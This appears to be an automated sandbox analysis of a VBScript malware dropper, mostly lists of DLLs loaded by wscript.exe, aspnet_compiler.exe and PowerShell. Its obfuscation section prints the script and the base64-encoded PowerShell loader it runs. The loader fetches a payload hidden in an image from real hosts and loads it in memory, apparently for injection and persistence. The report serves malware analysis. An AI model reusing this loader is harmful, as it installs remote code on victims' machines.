                        Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                        Data Obfuscation

                        barindex
                        VBScript performs obfuscated calls to suspicious functions
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell") Dim symcentry symcentry = "??????????????0I?????" hydrophobia = "??????????????0I?????po??????????????0I?????we??????????????0I?????rs??????????????0I?????hel??????????????0I?????l.e??????????????0I?????xe??????????????0I????? $??????????????0I?????concessionaries ??????????????0I?????= ??????????????0I?????'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow=='??????????????0I?????;??????????????0I?????$??????????????0I?????neurologically??????????????0I????? = ??????????????0I?????[S??????????????0I?????yst??????????????0I?????em??????????????0I?????.Tex??????????????0I?????t.E??????????????0I?????nc??????????????0I?????odi??????????????0I?????ng??????????????0I?????]??????????????0I?????:??????????????0I?????:
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
